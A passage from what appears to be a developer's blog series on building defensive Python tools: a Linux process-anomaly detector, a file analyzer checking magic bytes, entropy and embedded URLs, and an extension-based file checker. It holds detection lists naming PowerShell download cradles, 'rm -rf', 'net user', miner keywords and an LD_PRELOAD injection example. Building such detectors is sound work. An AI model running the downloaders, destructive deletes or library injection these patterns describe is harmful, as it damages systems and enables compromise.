<li>LISTEN → suspicious</li> <li>ESTABLISHED outbound connection → almost certain compromise</li> </ul> <p>A process connecting outward to port 4444 is basically waving a flag saying:<br> “someone else is controlling me.”</p> <h2> Detection 5 — Cryptominer Detection </h2> <p>Two techniques:</p> <ol> <li>Keyword detection </li> </ol> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>xmrig, monero, stratum, pool </code></pre> </div> <ol> <li>Behavioral detection </li> </ol> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>CPU usage &gt; 85% </code></pre> </div> <p>Why this matters:</p> <p>Modern attackers often don’t destroy systems.</p> <p>They monetize them.</p> <p>Many real breaches are discovered because servers suddenly run at 100% CPU 24/7.</p> <h2> Detection 6 — Deleted Executable Trick </h2> <p>Attackers often do:</p> <ol> <li>Run malware</li> <li>Delete the file</li> </ol> <p>Linux keeps the process alive in memory.</p> <p>The file disappears from disk but continues executing.</p> <p>Kernel hint:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>/proc/&lt;pid&gt;/exe -&gt; binary (deleted) </code></pre> </div> <p>ProcWatch detects exactly this.</p> <p>You can even recover it:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code><span class="nb">cp</span> /proc/&lt;pid&gt;/exe recovered_binary </code></pre> </div> <p>That’s a real forensic technique.</p> <h2> Detection 7 — LD_PRELOAD Injection (Advanced) </h2> <div class="highlight js-code-highlight"> <pre class="highlight python"><code><span class="n">LD_PRELOAD</span><span class="o">=/</span><span class="n">tmp</span><span class="o">/</span><span class="n">libevil</span><span class="p">.</span><span class="n">so</span> </code></pre> </div> <p>This is powerful.</p> <p>Instead of malware, attackers load a malicious library that intercepts system calls:</p> <ul> <li>hide files</li> <li>steal passwords</li> <li>fake authentication</li> </ul> <p>This is how many user-space rootkits work.</p> <p>Catching this is almost always a confirmed compromise.</p> <h2> The CLI </h2> <p>I designed the tool like <code>git</code>:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>procwatch scan procwatch scan -v -j procwatch watch procwatch info &lt;pid&gt; procwatch list </code></pre> </div> <h3> The most useful mode </h3> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>procwatch watch </code></pre> </div> <p>It alerts only on <strong>new suspicious processes</strong>, so you get a live feed of attacker activity.</p> <p>It feels surprisingly close to a real SOC monitoring console.</p> <h2> How This Helps in CTFs </h2> <p>Immediately after login:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>procwatch scan -j </code></pre> </div> <p>You now have a timestamped snapshot of the system’s process state.</p> <p>Instead of investigating 200 processes, you investigate <strong>3</strong>.</p> <p>That changes a 45-minute challenge into a 5-minute one.</p> <h2> Limitations </h2> <p>This tool operates in user space via <code>/proc</code>.</p> <p>So it <strong>cannot detect kernel rootkits</strong>.<br> If the kernel itself lies, ProcWatch will believe it.</p> <p>Also:</p> <ul> <li>Some interpreter alerts are false positives</li> <li>Containers hide processes via namespaces</li> </ul> <p>Future upgrades I’m considering:</p> <ul> <li>YARA memory scanning</li> <li>eBPF syscall monitoring</li> <li>ptrace detection</li> </ul> <h2> Running It </h2> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code>pip <span class="nb">install </span>psutil <span class="nb">sudo </span>python3 procwatch.py scan <span class="nt">-v</span> </code></pre> </div> <p><a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fa4a2ge4dxygk60sbu1zh.png" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fa4a2ge4dxygk60sbu1zh.png" alt=" " width="800" height="702"></a></p> <p><a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F0dr2xruzlfhpi72obgh5.png" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F0dr2xruzlfhpi72obgh5.png" alt=" " width="800" height="293"></a></p> <p>(Root gives full visibility into environment variables and connections.)</p> <h2> What I Learned </h2> <p>I started this to automate a CTF workflow.</p> <p>Instead, I learned something important:</p> <blockquote> <p>Attackers don’t hide files.<br> They hide behavior inside normal processes.</p> </blockquote> <p>And behavior is much harder to fake.</p> <p>ProcWatch doesn’t replace investigation.<br> It just shines a flashlight directly where you should start looking.</p> linux cybersecurity python programming Day 13 — I Stopped Trusting File Names and Started Inspecting Files (SafeOpen v2) Hafiz Shamnad Fri, 27 Feb 2026 05:30:21 +0000 https://forem.com/hafiz_shamnad/day-13-i-stopped-trusting-file-names-and-started-inspecting-files-safeopen-v2-2hpl https://forem.com/hafiz_shamnad/day-13-i-stopped-trusting-file-names-and-started-inspecting-files-safeopen-v2-2hpl <p>Yesterday my tool only looked at the filename.<br><br> Today I realised the filename is the lie attackers want you to believe.</p> <h3> The Moment Everything Changed </h3> <p>I took a harmless <code>malicious.bat</code> and renamed it to <code>invoice.pdf</code>.</p> <p>My old checker (Day 12) said: “Looks safe ✅”<br><br> Windows Explorer showed: <code>invoice.pdf</code> (icon = PDF)<br><br> A normal user would double-click without a second thought.</p> <p>But the file was still a batch script.</p> <p>That’s when it hit me:</p> <blockquote> <p><strong>The operating system doesn’t execute the name.<br><br> It executes the content.</strong></p> </blockquote> <h3> Files Have Two Identities </h3> <ol> <li> <strong>What the user sees</strong> → filename + icon (easy to fake) </li> <li> <strong>What the OS executes</strong> → magic bytes (first 2–8 bytes of the file)</li> </ol> <p>Real examples:</p> <ul> <li>PDF → always starts with <code>%PDF</code> </li> <li>Windows EXE → always starts with <code>MZ</code> </li> <li>ELF binary (Linux) → starts with <code>7f ELF</code> </li> <li>ZIP (DOCX, XLSX, JAR…) → starts with <code>PK\x03\x04</code> </li> </ul> <p>If the header says “executable” but the name says “document”, that’s a <strong>disguise</strong>. Game over for filename-only checkers.</p> <p>So I rebuilt everything.</p> <h3> SafeOpen v2 — “Inspect Before You Execute” </h3> <p>Here’s the complete, ready-to-run tool with full explanations of every new capability.<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight python"><code><span class="c1">#!/usr/bin/env python3 </span><span class="sh">"""</span><span class="s"> SafeOpen v2 — File Security Analyzer Inspect before you execute. </span><span class="sh">"""</span> <span class="kn">import</span> <span class="n">sys</span><span class="p">,</span> <span class="n">hashlib</span><span class="p">,</span> <span class="n">mimetypes</span><span class="p">,</span> <span class="n">os</span><span class="p">,</span> <span class="n">math</span><span class="p">,</span> <span class="n">struct</span><span class="p">,</span> <span class="n">time</span><span class="p">,</span> <span class="n">argparse</span><span class="p">,</span> <span class="n">json</span><span class="p">,</span> <span class="n">re</span> <span class="kn">from</span> <span class="n">datetime</span> <span class="kn">import</span> <span class="n">datetime</span> <span class="c1"># === 1. Magic Byte Detection (Upgrade #1) === </span><span class="n">MAGIC_SIGNATURES</span> <span class="o">=</span> <span class="p">{</span> <span class="sa">b</span><span class="sh">"</span><span class="s">MZ</span><span class="sh">"</span><span class="p">:</span> <span class="sh">"</span><span class="s">Windows PE Executable</span><span class="sh">"</span><span class="p">,</span> <span class="sa">b</span><span class="sh">"</span><span class="se">\x7f</span><span class="s">ELF</span><span class="sh">"</span><span class="p">:</span> <span class="sh">"</span><span class="s">Linux ELF Executable</span><span class="sh">"</span><span class="p">,</span> <span class="sa">b</span><span class="sh">"</span><span class="se">\xca\xfe\xba\xbe</span><span class="sh">"</span><span class="p">:</span> <span class="sh">"</span><span class="s">Java Class File</span><span class="sh">"</span><span class="p">,</span> <span class="sa">b</span><span class="sh">"</span><span class="s">PK</span><span class="se">\x03\x04</span><span class="sh">"</span><span class="p">:</span> <span class="sh">"</span><span class="s">ZIP Archive (DOCX/XLSX/JAR/etc)</span><span class="sh">"</span><span class="p">,</span> <span class="sa">b</span><span class="sh">"</span><span class="s">%PDF</span><span class="sh">"</span><span class="p">:</span> <span class="sh">"</span><span class="s">PDF Document</span><span class="sh">"</span><span class="p">,</span> <span class="sa">b</span><span class="sh">"</span><span class="se">\x89</span><span class="s">PNG</span><span class="sh">"</span><span class="p">:</span> <span class="sh">"</span><span class="s">PNG Image</span><span class="sh">"</span><span class="p">,</span> <span class="sa">b</span><span class="sh">"</span><span class="se">\xff\xd8\xff</span><span class="sh">"</span><span class="p">:</span> <span class="sh">"</span><span class="s">JPEG Image</span><span class="sh">"</span><span class="p">,</span> <span class="c1"># ... (full dict in the complete code below) </span><span class="p">}</span> <span class="k">def</span> <span class="nf">detect_magic</span><span class="p">(</span><span class="n">data</span><span class="p">):</span> <span class="k">for</span> <span class="n">magic</span><span class="p">,</span> <span class="n">desc</span> <span class="ow">in</span> <span class="n">MAGIC_SIGNATURES</span><span class="p">.</span><span class="nf">items</span><span class="p">():</span> <span class="k">if</span> <span class="n">data</span><span class="p">.</span><span class="nf">startswith</span><span class="p">(</span><span class="n">magic</span><span class="p">)</span> <span class="ow">or</span> <span class="n">magic</span><span class="p">.</span><span class="nf">lower</span><span class="p">()</span> <span class="ow">in</span> <span class="n">data</span><span class="p">[:</span><span class="mi">512</span><span class="p">].</span><span class="nf">lower</span><span class="p">():</span> <span class="k">return</span> <span class="n">desc</span> <span class="k">return</span> <span class="bp">None</span> </code></pre> </div> <p><strong>What this does</strong>: Reads the first 2048 bytes and matches against known headers.<br><br> Rename <code>malware.exe</code> → <code>report.pdf</code> → tool now screams <strong>“CRITICAL — Executable disguised as document”</strong>.<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight python"><code><span class="c1"># === 2. Entropy — The “Malware Smell” (Upgrade #2) === </span><span class="k">def</span> <span class="nf">entropy</span><span class="p">(</span><span class="n">data</span><span class="p">):</span> <span class="k">if</span> <span class="ow">not</span> <span class="n">data</span><span class="p">:</span> <span class="k">return</span> <span class="mf">0.0</span> <span class="n">occur</span> <span class="o">=</span> <span class="p">[</span><span class="mi">0</span><span class="p">]</span> <span class="o">*</span> <span class="mi">256</span> <span class="k">for</span> <span class="n">byte</span> <span class="ow">in</span> <span class="n">data</span><span class="p">:</span> <span class="n">occur</span><span class="p">[</span><span class="n">byte</span><span class="p">]</span> <span class="o">+=</span> <span class="mi">1</span> <span class="n">ent</span> <span class="o">=</span> <span class="mf">0.0</span> <span class="n">length</span> <span class="o">=</span> <span class="nf">len</span><span class="p">(</span><span class="n">data</span><span class="p">)</span> <span class="k">for</span> <span class="n">x</span> <span class="ow">in</span> <span class="n">occur</span><span class="p">:</span> <span class="k">if</span> <span class="n">x</span> <span class="o">==</span> <span class="mi">0</span><span class="p">:</span> <span class="k">continue</span> <span class="n">p</span> <span class="o">=</span> <span class="n">x</span> <span class="o">/</span> <span class="n">length</span> <span class="n">ent</span> <span class="o">-=</span> <span class="n">p</span> <span class="o">*</span> <span class="n">math</span><span class="p">.</span><span class="nf">log2</span><span class="p">(</span><span class="n">p</span><span class="p">)</span> <span class="k">return</span> <span class="n">ent</span> </code></pre> </div> <p><strong>Why it matters</strong>: Normal documents have structure → entropy ~4.0–6.5<br><br> Packed/encrypted malware → entropy &gt;7.5 (looks like random noise).<br><br> No signatures needed. Pure mathematics.<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight python"><code><span class="c1"># === 3. Suspicious Behaviour Indicators (Upgrade #3) === </span><span class="n">SUSPICIOUS_STRINGS</span> <span class="o">=</span> <span class="p">[</span> <span class="p">(</span><span class="sa">b</span><span class="sh">"</span><span class="s">powershell</span><span class="sh">"</span><span class="p">,</span> <span class="sh">"</span><span class="s">PowerShell downloadcradle</span><span class="sh">"</span><span class="p">),</span> <span class="p">(</span><span class="sa">b</span><span class="sh">"</span><span class="s">Invoke-WebRequest</span><span class="sh">"</span><span class="p">,</span> <span class="sh">"</span><span class="s">Downloader</span><span class="sh">"</span><span class="p">),</span> <span class="p">(</span><span class="sa">b</span><span class="sh">"</span><span class="s">rm -rf</span><span class="sh">"</span><span class="p">,</span> <span class="sh">"</span><span class="s">Destructive delete</span><span class="sh">"</span><span class="p">),</span> <span class="p">(</span><span class="sa">b</span><span class="sh">"</span><span class="s">net user</span><span class="sh">"</span><span class="p">,</span> <span class="sh">"</span><span class="s">User creation</span><span class="sh">"</span><span class="p">),</span> <span class="c1"># ... 20+ more patterns </span><span class="p">]</span> <span class="k">def</span> <span class="nf">scan_strings</span><span class="p">(</span><span class="n">data</span><span class="p">):</span> <span class="n">hits</span> <span class="o">=</span> <span class="p">[]</span> <span class="n">lower</span> <span class="o">=</span> <span class="n">data</span><span class="p">.</span><span class="nf">lower</span><span class="p">()</span> <span class="k">for</span> <span class="n">pattern</span><span class="p">,</span> <span class="n">desc</span> <span class="ow">in</span> <span class="n">SUSPICIOUS_STRINGS</span><span class="p">:</span> <span class="k">if</span> <span class="n">pattern</span><span class="p">.</span><span class="nf">lower</span><span class="p">()</span> <span class="ow">in</span> <span class="n">lower</span><span class="p">:</span> <span class="n">hits</span><span class="p">.</span><span class="nf">append</span><span class="p">(</span><span class="n">desc</span><span class="p">)</span> <span class="k">return</span> <span class="n">hits</span> </code></pre> </div> <p>Scans first 512 KB for known malicious patterns. A document containing <code>powershell -c Invoke-WebRequest</code> is <strong>not</strong> a document.<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight python"><code><span class="c1"># === 4. Embedded Network Indicators (Upgrade #4) === # Simple regex on decoded text </span><span class="n">urls</span> <span class="o">=</span> <span class="n">re</span><span class="p">.</span><span class="nf">findall</span><span class="p">(</span><span class="sa">r</span><span class="sh">'</span><span class="s">https?://[^\s\'</span><span class="sh">"</span><span class="s">&lt;&gt;]{4,80}</span><span class="sh">'</span><span class="p">,</span> <span class="n">text</span><span class="p">)</span> <span class="n">ips</span> <span class="o">=</span> <span class="n">re</span><span class="p">.</span><span class="nf">findall</span><span class="p">(</span><span class="sa">r</span><span class="sh">'</span><span class="s">\b(?:\d{1,3}\.){3}\d{1,3}\b</span><span class="sh">'</span><span class="p">,</span> <span class="n">text</span><span class="p">)</span> </code></pre> </div> <p>Shows you every C2 server or IP the file wants to talk to <strong>before</strong> you open it.<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight python"><code><span class="c1"># === 5. Cryptographic Hashes + PE Header Parsing (Upgrade #5) === </span><span class="k">def</span> <span class="nf">sha256sum</span><span class="p">(</span><span class="n">path</span><span class="p">):</span> <span class="bp">...</span> <span class="k">def</span> <span class="nf">md5sum</span><span class="p">(</span><span class="n">path</span><span class="p">):</span> <span class="bp">...</span> <span class="k">def</span> <span class="nf">get_pe_info</span><span class="p">(</span><span class="n">data</span><span class="p">):</span> <span class="c1"># Parses MZ → PE header, extracts architecture, compile time, DLL/EXE flag </span> <span class="bp">...</span> </code></pre> </div> <p>Even if the file is renamed 10 times, the SHA-256 is the same.<br><br> PE parser tells you “64-bit executable compiled on 2025-11-03”.</p> <h3> Risk Meter — One Number to Rule Them All </h3> <p>Every check adds to a 0–100 risk score:</p> <ul> <li>Extension mismatch → +25</li> <li>High entropy → +30</li> <li>Suspicious strings → +5 each</li> <li>Embedded URLs → +2 each</li> <li>PE executable in .pdf → instant jump</li> </ul> <p>Then a beautiful terminal risk meter with colour-coded threat level (CLEAN → CRITICAL).</p> <h3> What SafeOpen Is (and Is Not) </h3> <p><strong>Is</strong>: 5-second pre-execution triage for suspicious attachments.<br><br> <strong>Is not</strong>: Antivirus, sandbox, or signature-based detector.</p> <p>It solves the exact moment every SOC analyst, helpdesk tech, and power user faces:</p> <blockquote> <p>“Hey, is this invoice.pdf safe?”</p> </blockquote> <p><strong>How to use it right now:</strong><br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code>python3 safeopen.py suspicious.pdf <span class="nt">--strings</span> python3 safeopen.py <span class="k">*</span>.exe <span class="nt">--json-out</span> report.json </code></pre> </div> <h3> Results </h3> <p><a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fgtyuic8dds7rxioj7yj2.png" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fgtyuic8dds7rxioj7yj2.png" alt=" " width="782" height="412"></a><br> <a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fmtqkdq28ns9mpyk61l7x.png" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fmtqkdq28ns9mpyk61l7x.png" alt=" " width="562" height="35"></a><br> <a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Ff63uiayqapebo0zi466u.png" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Ff63uiayqapebo0zi466u.png" alt=" " width="800" height="899"></a><br> <a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fm1ptfywjl58iq0tbvfuu.png" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fm1ptfywjl58iq0tbvfuu.png" alt=" " width="800" height="93"></a><br> <a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fjgr9sce4bul9ix2ikrnv.png" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fjgr9sce4bul9ix2ikrnv.png" alt=" " width="724" height="943"></a><br> <a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fl7qlozuqtuodo67exqlg.png" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fl7qlozuqtuodo67exqlg.png" alt=" " width="228" height="23"></a><br> <a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F0q8vnzye8m8hrsirsaqc.png" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F0q8vnzye8m8hrsirsaqc.png" alt=" " width="721" height="926"></a></p> <h3> Final Thought </h3> <p>Most breaches aren’t zero-days.<br><br> They’re ordinary files opened by ordinary people who trusted the filename.<br> Sorry for missing yesterday’s post. I got pulled into some serious debugging and real testing, and the write-up itself took longer than I expected. I didn’t want to rush it and post something half-baked, so I waited until it was stable and properly explained. Day 13 is finally here 🙂</p> <p>SafeOpen gives you the habit:<br><br> <strong>Don’t execute first. Inspect first.</strong></p> <p>Drop a 🔥 if you want the Day 14 tomorrow.</p> python linux cybersecurity security Day 12 — I Built a File Safety Checker in Python (and Accidentally Learned How Malware Tricks Humans) Hafiz Shamnad Wed, 25 Feb 2026 11:35:31 +0000 https://forem.com/hafiz_shamnad/day-12-i-built-a-file-safety-checker-in-python-and-accidentally-learned-how-malware-tricks-33fo https://forem.com/hafiz_shamnad/day-12-i-built-a-file-safety-checker-in-python-and-accidentally-learned-how-malware-tricks-33fo <p><em>A simple cybersecurity tool that turned into a lesson about trust, psychology, and why file extensions lie.</em></p> <h2> The Moment That Started It </h2> <p>A friend of mine once received a file through chat.</p> <p>The name looked harmless:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>invoice_march.pdf.exe </code></pre> </div> <p>He almost opened it.</p> <p>Almost.</p> <p>That single moment stuck in my head. Not because malware is advanced… but because <strong>it didn’t need to be</strong>.<br> The attack relied on something much simpler:</p> <p>Human assumptions.</p> <p>We don’t read filenames carefully. We pattern-match.</p> <p>We see <code>pdf</code> → brain says <em>document</em> → double-click.</p> <p>So I wondered:</p> <blockquote> <p>Can I build a small tool that warns people <em>before</em> they open something dangerous?</p> </blockquote> <p>I thought it would take a day.</p> <p>It turned into one of my favorite cybersecurity Python projects.</p> <h2> Where It Started (7 Lines) </h2> <p>My first version was painfully simple:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight python"><code><span class="n">dangerous</span> <span class="o">=</span> <span class="p">[</span><span class="sh">"</span><span class="s">.exe</span><span class="sh">"</span><span class="p">,</span> <span class="sh">"</span><span class="s">.bat</span><span class="sh">"</span><span class="p">,</span> <span class="sh">"</span><span class="s">.cmd</span><span class="sh">"</span><span class="p">,</span> <span class="sh">"</span><span class="s">.scr</span><span class="sh">"</span><span class="p">,</span> <span class="sh">"</span><span class="s">.js</span><span class="sh">"</span><span class="p">,</span> <span class="sh">"</span><span class="s">.vbs</span><span class="sh">"</span><span class="p">,</span> <span class="sh">"</span><span class="s">.msi</span><span class="sh">"</span><span class="p">]</span> <span class="n">filename</span> <span class="o">=</span> <span class="nf">input</span><span class="p">(</span><span class="sh">"</span><span class="s">Enter file name: </span><span class="sh">"</span><span class="p">).</span><span class="nf">lower</span><span class="p">()</span> <span class="k">if</span> <span class="nf">any</span><span class="p">(</span><span class="n">filename</span><span class="p">.</span><span class="nf">endswith</span><span class="p">(</span><span class="n">ext</span><span class="p">)</span> <span class="k">for</span> <span class="n">ext</span> <span class="ow">in</span> <span class="n">dangerous</span><span class="p">):</span> <span class="nf">print</span><span class="p">(</span><span class="sh">"</span><span class="s">Suspicious file! Do NOT open.</span><span class="sh">"</span><span class="p">)</span> <span class="k">else</span><span class="p">:</span> <span class="nf">print</span><span class="p">(</span><span class="sh">"</span><span class="s">Looks safe (based on extension)</span><span class="sh">"</span><span class="p">)</span> </code></pre> </div> <p>It technically worked.</p> <p>But it was basically a digital version of a security guard who checks only the <em>color of your shirt</em>.</p> <p>Problems:</p> <ul> <li>No real file scanning</li> <li>No context</li> <li>No different risk levels</li> <li>No useful advice</li> </ul> <p>I wanted something closer to a <strong>real security tool</strong>.</p> <p>So I kept building.</p> <h2> Upgrade #1 — Threat Levels </h2> <p>Not every suspicious file is equally dangerous.</p> <p>Opening a <code>.pdf</code> is not the same as executing a <code>.exe</code>.</p> <p>So I designed a threat classification system:</p> <h3> 🔴 CRITICAL </h3> <p>Direct executables<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>.exe .bat .cmd .dll .scr .msi </code></pre> </div> <p>These can run code immediately.</p> <h3> 🟠 HIGH </h3> <p>Scripting payloads<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>.js .vbs .ps1 .reg .hta </code></pre> </div> <p>Often used in phishing emails and Windows attacks.</p> <h3> 🟡 MEDIUM </h3> <p>Conditional risk<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>.py .sh .jar .docm .iso </code></pre> </div> <p>Danger depends on how it is used.</p> <h3> 🔵 LOW </h3> <p>Usually safe but exploitable<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>.pdf .zip .doc </code></pre> </div> <p>Safe <em>most of the time</em>… but attackers love hiding here.</p> <p>Now instead of a boring “safe/unsafe”, the tool explains <strong>why</strong> a file is risky.</p> <h2> The Sneakiest Trick: Double Extensions </h2> <p>Here’s the real villain.<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>photo.jpg.exe document.pdf.exe resume.docx.scr </code></pre> </div> <p>Windows hides known extensions by default.</p> <p>So users only see:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>photo.jpg </code></pre> </div> <p>But the OS runs:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>photo.jpg.exe </code></pre> </div> <p>That’s not hacking.</p> <p>That’s social engineering.</p> <p>My checker now automatically detects this and raises a critical warning.</p> <h2> Upgrade #2 — Scanning Real Files </h2> <p>The tool now accepts an actual file path and extracts metadata:</p> <p>It shows:</p> <ul> <li>File size</li> <li>Last modified time</li> <li>MIME type</li> <li>SHA-256 hash</li> </ul> <p>The hash matters a lot.</p> <p>If a website claims:</p> <blockquote> <p>“Download our official installer”</p> </blockquote> <p>You can compare the hash.</p> <p>If it doesn’t match, the file is not the same file.</p> <p>No guessing. Just math.</p> <h2> Three Ways to Use the Tool </h2> <h3> 1) Interactive Mode </h3> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>python file_checker.py </code></pre> </div> <p>Scan multiple files one after another like a mini terminal application.</p> <h3> 2) Single File Scan </h3> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>python file_checker.py suspicious.exe -v </code></pre> </div> <p>Instant analysis + metadata.</p> <h3> 3) Directory Scan </h3> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>python file_checker.py -d ~/Downloads </code></pre> </div> <p>This one is powerful.</p> <p>Your downloads folder is basically a wildlife reserve for questionable files 🐍</p> <p>The script scans everything and summarizes results.</p> <h2> What I Actually Learned </h2> <p>This project taught me more cybersecurity than many theory classes.</p> <h3> 1. File Extensions Are Lies </h3> <p>Extensions are just labels.<br> They are not security.</p> <p>Real security tools inspect file headers, not names.</p> <h3> 2. Python Standard Library Is Underrated </h3> <p>I used:</p> <ul> <li> <code>hashlib</code> for hashing</li> <li> <code>argparse</code> for CLI</li> <li> <code>pathlib</code> for file handling</li> <li> <code>mimetypes</code> for detection</li> </ul> <p>No external libraries.</p> <p>Python already had everything.</p> <h3> 3. Good CLI UX Matters </h3> <p>Security tools fail if people don’t use them.</p> <p>So I added:</p> <ul> <li>Color output</li> <li>Clear warnings</li> <li>Contextual advice</li> <li>History in interactive mode</li> </ul> <p>A security tool should feel helpful, not scary.</p> <h2> What This Tool Cannot Do </h2> <p>This is important.</p> <p>This is <strong>not antivirus</strong>.</p> <p>Limitations:</p> <ul> <li>No malware signature detection</li> <li>No behavioral analysis</li> <li>No packed malware detection</li> <li>No online database lookup</li> </ul> <p>It’s a <strong>first-line warning system</strong>.</p> <p>Think of it as a digital friend saying:</p> <blockquote> <p>“Wait… are you sure you want to open that?”</p> </blockquote> <p>Sometimes that 2-second pause prevents infection.</p> <h2> What I Want To Add Next </h2> <p>Future ideas:</p> <ul> <li>VirusTotal hash lookup</li> <li>File header inspection (magic bytes)</li> <li>Real-time folder monitoring</li> <li>JSON output for automation</li> </ul> <p>Especially VirusTotal. That would make it genuinely useful.</p> <h2> Final Thoughts </h2> <p>Cybersecurity is not always about advanced exploits.</p> <p>Many attacks succeed because:</p> <ul> <li>users trust filenames</li> <li>systems hide extensions</li> <li>people click fast</li> </ul> <p>This tool won’t make you invincible.</p> <p>But it <em>will</em> stop the most common mistake:</p> <p><strong>Opening the wrong file.</strong></p> <p>And honestly… that’s how a lot of compromises begin.</p> <p>If you’re learning Python and cybersecurity, build tools like this.<br> You’ll learn file handling, hashing, CLI design, and threat modeling in one project.</p> <p>Also:</p> <p>Your downloads folder deserves suspicion.</p> <p>Stay curious. Stay careful.</p> python beginners linux cybersecurity Day 11 — I Built My Own SIEM-Style Log Analyzer (LogGuardian) in Pure Python Hafiz Shamnad Tue, 24 Feb 2026 14:20:34 +0000 https://forem.com/hafiz_shamnad/day-11-i-built-my-own-siem-style-log-analyzer-logguardian-in-pure-python-1279 https://forem.com/hafiz_shamnad/day-11-i-built-my-own-siem-style-log-analyzer-logguardian-in-pure-python-1279 <p>For the past few days I’ve been doing something unusual.</p> <p>Instead of only learning cybersecurity theory, I’ve been <strong>building the tools that security engineers actually use</strong>.</p> <p>I built scanners.<br> I exploited vulnerabilities.<br> I detected secrets in source code.</p> <p>Today I switched sides.</p> <p>Today I became the defender.</p> <h2> The Problem Nobody Notices (Until It’s Too Late) </h2> <p>Every Linux server quietly keeps a diary.</p> <p>Inside:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>/var/log/auth.log </code></pre> </div> <p>And it looks harmless… until you actually read it:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>Mar 14 03:22:14 server sshd[9841]: 